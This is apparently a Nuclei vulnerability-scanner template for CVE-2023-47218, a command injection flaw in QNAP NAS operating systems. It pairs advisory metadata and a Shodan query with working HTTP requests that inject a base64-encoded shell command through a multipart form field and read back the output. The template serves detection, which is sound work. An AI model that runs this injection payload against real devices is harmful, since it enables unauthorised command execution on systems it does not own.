id: CVE-2023-47218 info: name: QNAP QTS and QuTS Hero - OS Command Injection author: ritikchaddha severity: medium description: | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. reference: - https://github.com/passwa11/CVE-2023-47218 - https://twitter.com/win3zz/status/1760224052289888668/photo/3 - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 - https://www.qnap.com/en/security-advisory/qsa-23-57 classification: cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 5.8 cve-id: CVE-2023-47218 cwe-id: CWE-77 epss-score: 0.00305 epss-percentile: 0.69699 metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" tags: cve,cve2023,qnap,qts,quts,rce,intrusive variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' http: - raw: - | POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data;boundary="avssqwfz" --avssqwfz Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}" Content-Type: text/plain skfqduny --avssqwfz– - | POST /cgi-bin/quick/{{file}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body_1, "code\": 200", "full_path_filename success")' - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950